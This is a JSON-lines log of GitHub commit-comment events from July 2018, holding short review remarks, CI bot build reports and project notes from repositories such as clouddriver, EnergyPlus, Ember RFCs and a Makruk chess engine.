{"id":"8029874207","type":"CommitCommentEvent","actor":{"login":"qgaillot"},"repo":{"name":"mberard/AEPONYX"},"payload":{"comment":{"id":29861551,"position":null,"line":null,"path":null,"commit_id":"77a8f9201d3004e7834c8e9aa9da18003bdad0ec","created_at":"2018-07-27T17:33:54Z","updated_at":"2018-07-27T17:33:54Z","author_association":"COLLABORATOR","body":"Preload le nom de la layer du dernier polygone sélectionné\r\n"}},"created_at":"2018-07-27T17:33:54Z"}
{"id":"8029874994","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29861553,"position":61,"line":34,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T17:34:06Z","updated_at":"2018-07-27T17:34:06Z","author_association":"OWNER","body":"Good call - thanks"}},"created_at":"2018-07-27T17:34:06Z"}
{"id":"8029877234","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29861557,"position":34,"line":34,"path":"app/controllers/users_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T17:34:36Z","updated_at":"2018-07-27T17:34:36Z","author_association":"NONE","body":"Aparentemente seria algo no sentido de formatar a resposta de acordo com o desejo do cliente, ou seja para incluir web-service, mais detalhes se interessar aqui: https://api.rubyonrails.org/classes/ActionController/MimeResponds.html"}},"created_at":"2018-07-27T17:34:36Z"}
{"id":"8029878018","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"mixonic/rfcs"},"payload":{"comment":{"id":29861559,"position":120,"line":646,"path":"text/0000-module-unification-namespaces.md","commit_id":"5be49c7c0367dbf72464a6402122cf89b927ac00","created_at":"2018-07-27T17:34:46Z","updated_at":"2018-07-27T17:34:46Z","author_association":"NONE","body":"Does this imply that there is no way to override a component? Like if you have `<Select />` everywhere and you pull in another implementation with the same API, you have to rename all the things if you are still using both?"}},"created_at":"2018-07-27T17:34:46Z"}
{"id":"8029885986","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29861584,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T17:36:23Z","updated_at":"2018-07-27T17:36:23Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2988 of 2988 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T17:36:23Z"}
{"id":"8029891019","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29861595,"position":6,"line":6,"path":"app/models/user.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T17:37:23Z","updated_at":"2018-07-27T17:37:23Z","author_association":"NONE","body":"Sim, acredito que faça, porém você precisa utilizá-lo, ele não é usado automaticamente, o README no github já deve ser suficiente para usar: https://github.com/codahale/bcrypt-ruby"}},"created_at":"2018-07-27T17:37:23Z"}
{"id":"8029891446","type":"CommitCommentEvent","actor":{"login":"maxkasy"},"repo":{"name":"maxkasy/home"},"payload":{"comment":{"id":29861597,"position":null,"line":null,"path":null,"commit_id":"c15f8a44dc8e39bc184fb1c6f4ae9dcd87ec28de","created_at":"2018-07-27T17:37:29Z","updated_at":"2018-07-27T17:37:29Z","author_association":"OWNER","body":"reverse theme"}},"created_at":"2018-07-27T17:37:29Z"}
{"id":"8029894138","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29861604,"position":null,"line":null,"path":null,"commit_id":"a1623934c5953be97a002b61bda43b5929f5e69a","created_at":"2018-07-27T17:38:07Z","updated_at":"2018-07-27T17:38:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Design and Build Endpoints](https://trello.com/c/MhMK13Aa/2-design-and-build-endpoints)"}},"created_at":"2018-07-27T17:38:07Z"}
{"id":"8029894658","type":"CommitCommentEvent","actor":{"login":"eFrysTon"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29861605,"position":90,"line":8793,"path":"frmViewMain.pas","commit_id":"befad86233834ab61b97fba7420980f7b8cc2380","created_at":"2018-07-27T17:38:14Z","updated_at":"2018-07-27T17:38:14Z","author_association":"CONTRIBUTOR","body":"CRC32 comes out of the File object here"}},"created_at":"2018-07-27T17:38:14Z"}
{"id":"8029895791","type":"CommitCommentEvent","actor":{"login":"banesullivan"},"repo":{"name":"OpenGeoVis/PVGeo"},"payload":{"comment":{"id":29861610,"position":null,"line":null,"path":null,"commit_id":"cfb7bf07c5a59b30d33ca05b41854bb20374af26","created_at":"2018-07-27T17:38:29Z","updated_at":"2018-07-27T17:38:29Z","author_association":"MEMBER","body":"Found in response to #16. Be sure to update after patched version 1.1.8"}},"created_at":"2018-07-27T17:38:29Z"}
{"id":"8029895854","type":"CommitCommentEvent","actor":{"login":"eFrysTon"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29861612,"position":117,"line":8892,"path":"frmViewMain.pas","commit_id":"befad86233834ab61b97fba7420980f7b8cc2380","created_at":"2018-07-27T17:38:30Z","updated_at":"2018-07-27T17:38:30Z","author_association":"CONTRIBUTOR","body":"and gets added to the record here"}},"created_at":"2018-07-27T17:38:30Z"}
{"id":"8029900077","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29861626,"position":null,"line":null,"path":null,"commit_id":"5fee20655acba9328b9aba665075d191db7afe1d","created_at":"2018-07-27T17:39:24Z","updated_at":"2018-07-27T17:39:24Z","author_association":"OWNER","body":"This should be a lot better 428aabe530b2e38ea8e2fae7151072d519e8dd6f\r\nit will only fire if you change head, shoulder or chest slot and will scan only azerite slots"}},"created_at":"2018-07-27T17:39:24Z"}
{"id":"8029900299","type":"CommitCommentEvent","actor":{"login":"ttomsu"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861628,"position":64,"line":55,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:39:27Z","updated_at":"2018-07-27T17:39:27Z","author_association":"OWNER","body":"That's definitely possible - though I'd imagine for developers we'd be more interested in GCP as a whole, but I could see someone _only_ wanting to build GCE."}},"created_at":"2018-07-27T17:39:27Z"}
{"id":"8029901405","type":"CommitCommentEvent","actor":{"login":"shirali73"},"repo":{"name":"shirali73/hello-world"},"payload":{"comment":{"id":29861631,"position":null,"line":null,"path":null,"commit_id":"408b50368f52b35a887cc8f11f2879164d0c319c","created_at":"2018-07-27T17:39:41Z","updated_at":"2018-07-27T17:39:41Z","author_association":"OWNER","body":"This is my 1st commit comment"}},"created_at":"2018-07-27T17:39:41Z"}
{"id":"8029902131","type":"CommitCommentEvent","actor":{"login":"ttomsu"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861635,"position":76,"line":67,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:39:50Z","updated_at":"2018-07-27T17:39:50Z","author_association":"OWNER","body":"I could be wrong, but I think Titus is Netflix-only?"}},"created_at":"2018-07-27T17:39:50Z"}
{"id":"8029908897","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29861651,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T17:41:19Z","updated_at":"2018-07-27T17:41:19Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T17:41:19Z"}
{"id":"8029910417","type":"CommitCommentEvent","actor":{"login":"pivovarit"},"repo":{"name":"assertj/assertj-vavr"},"payload":{"comment":{"id":29861655,"position":11,"line":11,"path":"src/test/java/org/assertj/vavr/api/TryAssert_isFailure_Test.java","commit_id":"d3cd134f6c7981020beadb3bb4d5660f2cd11a00","created_at":"2018-07-27T17:41:40Z","updated_at":"2018-07-27T17:41:40Z","author_association":"COLLABORATOR","body":"@mchmielarz looks like `BaseTest` is missing ;)"}},"created_at":"2018-07-27T17:41:40Z"}
{"id":"8029911260","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29861660,"position":null,"line":null,"path":null,"commit_id":"7ca7cccd2ed95cde29c908ea36f43daa86531250","created_at":"2018-07-27T17:41:50Z","updated_at":"2018-07-27T17:41:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-994](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-994).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-994-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T17:41:50Z"}
{"id":"8029911399","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29861662,"position":null,"line":null,"path":null,"commit_id":"2516d74b0842f714b50be1279e26a164d6e22f7b","created_at":"2018-07-27T17:41:52Z","updated_at":"2018-07-27T17:41:52Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1103](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1103).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1103-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-27T17:41:52Z"}
{"id":"8029911475","type":"CommitCommentEvent","actor":{"login":"ashish-jadhav"},"repo":{"name":"ashish-jadhav/firstRepo"},"payload":{"comment":{"id":29861664,"position":null,"line":null,"path":null,"commit_id":"e85fb97953b142a5304df7ddcceb8f87d49645af","created_at":"2018-07-27T17:41:53Z","updated_at":"2018-07-27T17:41:53Z","author_association":"OWNER","body":"this is good that I have added php to this"}},"created_at":"2018-07-27T17:41:53Z"}
{"id":"8029913302","type":"CommitCommentEvent","actor":{"login":"allenbdavis"},"repo":{"name":"allenbdavis/RVOS"},"payload":{"comment":{"id":29861678,"position":null,"line":null,"path":null,"commit_id":"a6dee3d54be533a2f53fadc1d57dabdd1a3789ec","created_at":"2018-07-27T17:42:17Z","updated_at":"2018-07-27T17:42:17Z","author_association":"OWNER","body":"or rather, ignore ipynb checkpoints."}},"created_at":"2018-07-27T17:42:17Z"}
{"id":"8029914327","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/mifkad"},"payload":{"comment":{"id":29861680,"position":null,"line":null,"path":null,"commit_id":"9c72e133984269dfff16f5d2f9fc6664ba1ef043","created_at":"2018-07-27T17:42:31Z","updated_at":"2018-07-27T17:42:31Z","author_association":"OWNER","body":"Think about whether you want to use HashMaps with string or Uuid keys, for easier lookup/replace"}},"created_at":"2018-07-27T17:42:31Z"}
{"id":"8029918873","type":"CommitCommentEvent","actor":{"login":"vafl-brut"},"repo":{"name":"engagepeople/podium-vue-components"},"payload":{"comment":{"id":29861693,"position":null,"line":null,"path":null,"commit_id":"ecb3be0a40833ccb665d48d36453987b19eb8af6","created_at":"2018-07-27T17:43:31Z","updated_at":"2018-07-27T17:43:31Z","author_association":"COLLABORATOR","body":"I feel that limiting by the number of characters as opposed to the number of words would yield more consistent results. \r\nCould we try the original approach, ensuring that if limit ends up being middle of a word we show it fully (or trim it completely with the rest of the string)"}},"created_at":"2018-07-27T17:43:31Z"}
{"id":"8029925548","type":"CommitCommentEvent","actor":{"login":"ukroplus"},"repo":{"name":"ukroplus/arm_kernel_cortina-SE-208BW"},"payload":{"comment":{"id":29861706,"position":null,"line":null,"path":null,"commit_id":"14466ff629b1277b0a890ff7ca6bacb9ae5aafeb","created_at":"2018-07-27T17:44:55Z","updated_at":"2018-07-27T17:44:55Z","author_association":"OWNER","body":"Has been remove header (notice). But now us see true type of license (GNU - GPL v.2.0 and above) on Github.com web-page.\r\nBest regards Valerij Meleschenko."}},"created_at":"2018-07-27T17:44:55Z"}
{"id":"8029931199","type":"CommitCommentEvent","actor":{"login":"gBringout"},"repo":{"name":"gBringout/SphericalHarmonics"},"payload":{"comment":{"id":29861720,"position":null,"line":null,"path":null,"commit_id":"a4c9e4491d7491d2fed2a983f757a1e84ebc396c","created_at":"2018-07-27T17:46:08Z","updated_at":"2018-07-27T17:46:08Z","author_association":"OWNER","body":"Hello,\r\nI will need more time to check that. For me it is the scaling factor from a transformation which I integrated to the schmidt factor. I will double check. Do you have a minimal working example that shows that the implementation of this transformation is wrong?"}},"created_at":"2018-07-27T17:46:08Z"}
{"id":"8029931882","type":"CommitCommentEvent","actor":{"login":"Jose-Njoro"},"repo":{"name":"Jose-Njoro/systemc-examples"},"payload":{"comment":{"id":29861722,"position":null,"line":null,"path":null,"commit_id":"e5a3cb8004f8b4b4572bb898285bee05b28473fd","created_at":"2018-07-27T17:46:17Z","updated_at":"2018-07-27T17:46:17Z","author_association":"OWNER","body":"This is the generic implementation of the decorder 2by 4 using the code base for decorder 1by2 provided"}},"created_at":"2018-07-27T17:46:17Z"}
{"id":"8029933002","type":"CommitCommentEvent","actor":{"login":"HenryFuerez"},"repo":{"name":"LuisRAnrrango/Proyecto-Final-SoftwareII"},"payload":{"comment":{"id":29861723,"position":8,"line":36,"path":"backend/views/factura/index.php","commit_id":"a4d45f4464eefb20dcae82c9206850f33f63f555","created_at":"2018-07-27T17:46:31Z","updated_at":"2018-07-27T17:46:31Z","author_association":"COLLABORATOR","body":"//'ESTADO',"}},"created_at":"2018-07-27T17:46:31Z"}
{"id":"8029934533","type":"CommitCommentEvent","actor":{"login":"zeroyao"},"repo":{"name":"Unity-Technologies/ScriptableRenderPipeline"},"payload":{"comment":{"id":29861730,"position":4,"line":84,"path":"com.unity.render-pipelines.high-definition/HDRP/Editor/Material/Lit/LitShaderPreprocessor.cs","commit_id":"0e9b25a99847a5a2f40c6feaebc0ca7c820d84f5","created_at":"2018-07-27T17:46:52Z","updated_at":"2018-07-27T17:46:52Z","author_association":"COLLABORATOR","body":"Merged master and done what you said"}},"created_at":"2018-07-27T17:46:52Z"}
{"id":"8029935700","type":"CommitCommentEvent","actor":{"login":"mixonic"},"repo":{"name":"mixonic/rfcs"},"payload":{"comment":{"id":29861740,"position":120,"line":646,"path":"text/0000-module-unification-namespaces.md","commit_id":"5be49c7c0367dbf72464a6402122cf89b927ac00","created_at":"2018-07-27T17:47:07Z","updated_at":"2018-07-27T17:47:07Z","author_association":"OWNER","body":"Yes it does. There is a supporting suggestion that we not use `src/preamble.hbs` in addons, but instead have addons use post-install hbs template transforms to add or update their `{{use` line in the application's `src/preamble.hbs`. This would lessen the confusion about where a \"global\" thing comes from because *all* \"global\" `{{use}}` statements would be in `src/preamble.hbs` of the app. I haven't added this idea to the RFC yet, I'm still unsure about it.\r\n\r\nBut yes, you are correct. The above would make this less of a big deal (since the app author can always change what an addon wanted to do by going into `src/preamble.hbs`) but you can imagine sometimes you want to import `t`, really use the name `t` without reassignment, and `t` is also already in the `src/preamble.hbs`, and you really don't want to change *that* either, and so you are annoyed that you must `{{use t as local-t from 'other-intl-addon'}}`.\r\n\r\nIn practice that should not be so often, and in addition this decisions will further discourage addon authors from claiming arbitrary \"globals\" in an app. Instead they will want to be selective. Remember that even if an addon didn't expose a global, the app author can easily add a line to their `src/preamble.hbs` if they want that thing available everywhere.\r\n\r\n(and additional reason discouraging globals is good: Global items (symbols from `{{use}}`) have a higher precedence than lookups from your own app. If `ember-power-select` adds a preamble line of `{{use Select from 'ember-power-select'}}` you will not be able to invoked an app component of your own named `Select`. We really need to discourage globals in all but the most narrow, special cases)"}},"created_at":"2018-07-27T17:47:07Z"}
{"id":"8029937490","type":"CommitCommentEvent","actor":{"login":"robzienert"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861741,"position":76,"line":67,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:47:30Z","updated_at":"2018-07-27T17:47:30Z","author_association":"NONE","body":"It's not Netflix-only, it's totally open source and I believe other companies do use it. I'm not opposed to having a netflix platform, though."}},"created_at":"2018-07-27T17:47:30Z"}
{"id":"8029937718","type":"CommitCommentEvent","actor":{"login":"dsfb"},"repo":{"name":"dsfb/Exercicios_Caelum_Java_SE"},"payload":{"comment":{"id":29861742,"position":null,"line":null,"path":null,"commit_id":"9e15f78b87866fdd9d4dbf07f955de528ea66b3c","created_at":"2018-07-27T17:47:32Z","updated_at":"2018-07-27T17:47:32Z","author_association":"OWNER","body":"Obrigado, Erisvaldo!\r\nEu fiz assim porque o exercício da referida apostila foi proposto para pedir este código-fonte como resposta!\r\nMesmo assim, agradeço-lhe o seu comentário, e ele será útil para mim quando eu estiver trabalhando com Java profissionalmente, ainda que seja como freelancer ou empreendedor!"}},"created_at":"2018-07-27T17:47:32Z"}
{"id":"8029941706","type":"CommitCommentEvent","actor":{"login":"robzienert"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861754,"position":55,"line":46,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:48:22Z","updated_at":"2018-07-27T17:48:22Z","author_association":"NONE","body":"I would think ES would be a core requirement, even if it's optional, it isn't enabling AWS-specific features."}},"created_at":"2018-07-27T17:48:22Z"}
{"id":"8029942703","type":"CommitCommentEvent","actor":{"login":"lwander"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861757,"position":64,"line":55,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:48:35Z","updated_at":"2018-07-27T17:48:35Z","author_association":"COLLABORATOR","body":"Moving out GAE out of GCP allows us to avoid having to always ship gcloud with each build."}},"created_at":"2018-07-27T17:48:35Z"}
{"id":"8029947728","type":"CommitCommentEvent","actor":{"login":"udf"},"repo":{"name":"confluentinc/ksql"},"payload":{"comment":{"id":29861785,"position":null,"line":null,"path":null,"commit_id":"2e760553e4a2673ea0640ae878d77197f49468c4","created_at":"2018-07-27T17:49:36Z","updated_at":"2018-07-27T17:49:36Z","author_association":"NONE","body":"Nice."}},"created_at":"2018-07-27T17:49:36Z"}
{"id":"8029947804","type":"CommitCommentEvent","actor":{"login":"mehtadarshak"},"repo":{"name":"mehtadarshak/AndroidEssentials"},"payload":{"comment":{"id":29861786,"position":null,"line":null,"path":null,"commit_id":"d2ddd04f6b1e4633cc0a73d5a5f11637407c76c0","created_at":"2018-07-27T17:49:37Z","updated_at":"2018-07-27T17:49:37Z","author_association":"OWNER","body":"Added AlertDialog facility with/without title."}},"created_at":"2018-07-27T17:49:37Z"}
{"id":"8029949610","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29861787,"position":null,"line":null,"path":null,"commit_id":"0ebb592b6813b540127c5f98a44489d7b3cb14b9","created_at":"2018-07-27T17:50:01Z","updated_at":"2018-07-27T17:50:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Design and Build Endpoints](https://trello.com/c/MhMK13Aa/2-design-and-build-endpoints)"}},"created_at":"2018-07-27T17:50:01Z"}
{"id":"8029949830","type":"CommitCommentEvent","actor":{"login":"drouu"},"repo":{"name":"Cavorter/twinlug"},"payload":{"comment":{"id":29861788,"position":null,"line":null,"path":null,"commit_id":"ed300ef2180b1bdafb41f06b427b0bbc79916096","created_at":"2018-07-27T17:50:03Z","updated_at":"2018-07-27T17:50:03Z","author_association":"COLLABORATOR","body":"wait, wut?  there's no such thing as </img>  :)\r\nalso, correct relative uri would be   src=\"images/Micropolis-Waterfront_Waterlevel.png\""}},"created_at":"2018-07-27T17:50:03Z"}
{"id":"8029958573","type":"CommitCommentEvent","actor":{"login":"ahanniga"},"repo":{"name":"klamonte/jexer"},"payload":{"comment":{"id":29861796,"position":null,"line":null,"path":null,"commit_id":"d625990deaa2c24624adc9fbd3fcab58891f5aef","created_at":"2018-07-27T17:51:51Z","updated_at":"2018-07-27T17:51:51Z","author_association":"NONE","body":"Good to hear! This is awesome. Keep up the good work."}},"created_at":"2018-07-27T17:51:51Z"}
{"id":"8029960968","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29861806,"position":83,"line":47,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T17:52:22Z","updated_at":"2018-07-27T17:52:22Z","author_association":"OWNER","body":"cool, that worked - thought i needed it to use the BigNumber operations. thanks"}},"created_at":"2018-07-27T17:52:22Z"}
{"id":"8029968329","type":"CommitCommentEvent","actor":{"login":"obra"},"repo":{"name":"keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID"},"payload":{"comment":{"id":29861814,"position":null,"line":null,"path":null,"commit_id":"ee80abdd200bfab383a45638b178384161c5cbbd","created_at":"2018-07-27T17:53:52Z","updated_at":"2018-07-27T17:53:52Z","author_association":"MEMBER","body":"I think the reason for the disconnect here (and with what you'd called\n'allowed _modifiers') may be that you and I have different assumptions\nabout whether metadata related to the current state of the keyboard is\npersistent across cycles by default or ephemeral across cycles by default.\nUp to now, everything other than \"lastKeyReport\" was ephemeral.\n\nIt took me a couple hours of spelunking to realize that allowed_modifiers\n(now modifier_flag_mask) was designed to be persistent, which is why I\nadded documentation about their lifecycles next to the definitions of the\nvariables.\n\nnewly_toggled_on_keycode (to me) reads oddly. Do you have thoughts on other\npossibly better names?\nᐧ\n\nOn Fri, Jul 27, 2018 at 5:57 AM Michael Richters <notifications@github.com>\nwrote:\n\n> I previously made exactly the opposite name change in order to clarify how\n> this variable is used. Calling it last_keycode_toggled_on implies that it\n> will be persistent through cycles. A better name should at least suggest\n> the fact that it's only storing the value of a key that toggled on in the\n> current cycle.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID/commit/ee80abdd200bfab383a45638b178384161c5cbbd#commitcomment-29858180>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACxaMxYNdYC_zz0xzxd4BVRfTSQI8DWks5uKw5KgaJpZM4Vjc-0>\n> .\n>\n"}},"created_at":"2018-07-27T17:53:52Z"}
{"id":"8029971977","type":"CommitCommentEvent","actor":{"login":"vlebourl"},"repo":{"name":"EddieRingle/clion-cmakedocs"},"payload":{"comment":{"id":29861822,"position":null,"line":null,"path":null,"commit_id":"58076e34dbf6b9b58a64940f2ba1badc024ce846","created_at":"2018-07-27T17:54:37Z","updated_at":"2018-07-27T17:54:37Z","author_association":"CONTRIBUTOR","body":"great job, thanks a lot 👍 "}},"created_at":"2018-07-27T17:54:37Z"}
{"id":"8029987908","type":"CommitCommentEvent","actor":{"login":"maaiika"},"repo":{"name":"maaiika/iovyroot"},"payload":{"comment":{"id":29861847,"position":null,"line":null,"path":null,"commit_id":"05e4cb293e7d2b0c584ff0869ccf580aec32c29f","created_at":"2018-07-27T17:57:58Z","updated_at":"2018-07-27T17:57:58Z","author_association":"OWNER","body":"add support for docomo Z5 Premium 32.0.B.0.426"}},"created_at":"2018-07-27T17:57:58Z"}
{"id":"8029989009","type":"CommitCommentEvent","actor":{"login":"asaferamos"},"repo":{"name":"culturagovbr/mapasculturais"},"payload":{"comment":{"id":29861853,"position":null,"line":null,"path":null,"commit_id":"533bc6502690585b98c623360922d3ece7684ca7","created_at":"2018-07-27T17:58:11Z","updated_at":"2018-07-27T17:58:11Z","author_association":"NONE","body":"Melhora na exibição das informações\r\n\r\n![image](https://user-images.githubusercontent.com/2385995/43338637-67f7ac84-91ad-11e8-8798-7d7dc1f33475.png)\r\n"}},"created_at":"2018-07-27T17:58:11Z"}
{"id":"8029989644","type":"CommitCommentEvent","actor":{"login":"jessicaaraujoreis25"},"repo":{"name":"jessicaaraujoreis25/jessica"},"payload":{"comment":{"id":29861854,"position":null,"line":null,"path":null,"commit_id":"963c2a019144a15d2d653a6be5501747953af339","created_at":"2018-07-27T17:58:19Z","updated_at":"2018-07-27T17:58:19Z","author_association":"OWNER","body":"Primeiro Commit"}},"created_at":"2018-07-27T17:58:19Z"}
{"id":"8029989697","type":"CommitCommentEvent","actor":{"login":"dvc94ch"},"repo":{"name":"riscv-rust/compiler-builtins"},"payload":{"comment":{"id":29861856,"position":4,"line":61,"path":"src/lib.rs","commit_id":"c200f6dd62fc538cb5abf0832a95976640120e0e","created_at":"2018-07-27T17:58:19Z","updated_at":"2018-07-27T17:58:19Z","author_association":"MEMBER","body":"is it ok to just change it in the attribute? I don't see why this intrinsic can't be used for the improbable case that someone builds a RV64I core."}},"created_at":"2018-07-27T17:58:19Z"}
{"id":"8029990553","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29861862,"position":null,"line":null,"path":null,"commit_id":"36f41b39843d8c8101e0b758ae69fb2d6deaa7cd","created_at":"2018-07-27T17:58:30Z","updated_at":"2018-07-27T17:58:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [STRETCH - Use create-react-app](https://trello.com/c/k5cFeTRP/3-stretch-use-create-react-app)"}},"created_at":"2018-07-27T17:58:30Z"}
{"id":"8029993437","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29861867,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-27T17:59:06Z","updated_at":"2018-07-27T17:59:06Z","author_association":"NONE","body":"8/8/4M3/2ksn3/8/2K1N3/8/8 b KMkm -\n\nOR\n\n8/8/4M3/2ksn3/8/2K5/8/3R4 b KMkm -\n\nLIKE THAT WHITE WILL SUCIDE MORE PIECES VALUES TO CAPTURE BISHOP.\n\nregard\n\npcst\n\nOn Fri, Jul 27, 2018 at 9:10 AM, Fabian Fichter <notifications@github.com>\nwrote:\n\n> @thaichessswinboard <https://github.com/thaichessswinboard> There do not\n> seem to be any images in your comment. Could you please provide FENs?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ianfab/Makruk-Stockfish/commit/72e094284146c2db8f14c511e2794099c3158305#commitcomment-29855355>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnxMlMA3hXXlT2Sff1AF4XBU0dPeGmWoks5uKsrggaJpZM4Vghb9>\n> .\n>\n"}},"created_at":"2018-07-27T17:59:06Z"}
{"id":"8029993488","type":"CommitCommentEvent","actor":{"login":"afuriza"},"repo":{"name":"afuriza/kyoukai_framework"},"payload":{"comment":{"id":29861869,"position":5,"line":21,"path":"src/units/standard/kyoukai.standard.httpserver.pas","commit_id":"479be6453da49b243ef7e7b0092554ab2c62a386","created_at":"2018-07-27T17:59:07Z","updated_at":"2018-07-27T17:59:07Z","author_association":"OWNER","body":"CMem will remove Kyoukai memory hungry when Threaded set to True."}},"created_at":"2018-07-27T17:59:07Z"}
{"id":"8029997893","type":"CommitCommentEvent","actor":{"login":"jessicaaraujoreis25"},"repo":{"name":"jessicaaraujoreis25/jessica"},"payload":{"comment":{"id":29861883,"position":null,"line":null,"path":null,"commit_id":"963c2a019144a15d2d653a6be5501747953af339","created_at":"2018-07-27T18:00:02Z","updated_at":"2018-07-27T18:00:02Z","author_association":"OWNER","body":"po"}},"created_at":"2018-07-27T18:00:02Z"}
{"id":"8029999502","type":"CommitCommentEvent","actor":{"login":"awjuliani"},"repo":{"name":"Unity-Technologies/ml-agents"},"payload":{"comment":{"id":29861891,"position":22,"line":173,"path":"docs/Learning-Environment-Design-Agents.md","commit_id":"438eb915f5060f27d6dcdf62ce095929e1c4f2b5","created_at":"2018-07-27T18:00:21Z","updated_at":"2018-07-27T18:00:21Z","author_association":"COLLABORATOR","body":"I don't think jumping is possible in push block."}},"created_at":"2018-07-27T18:00:21Z"}
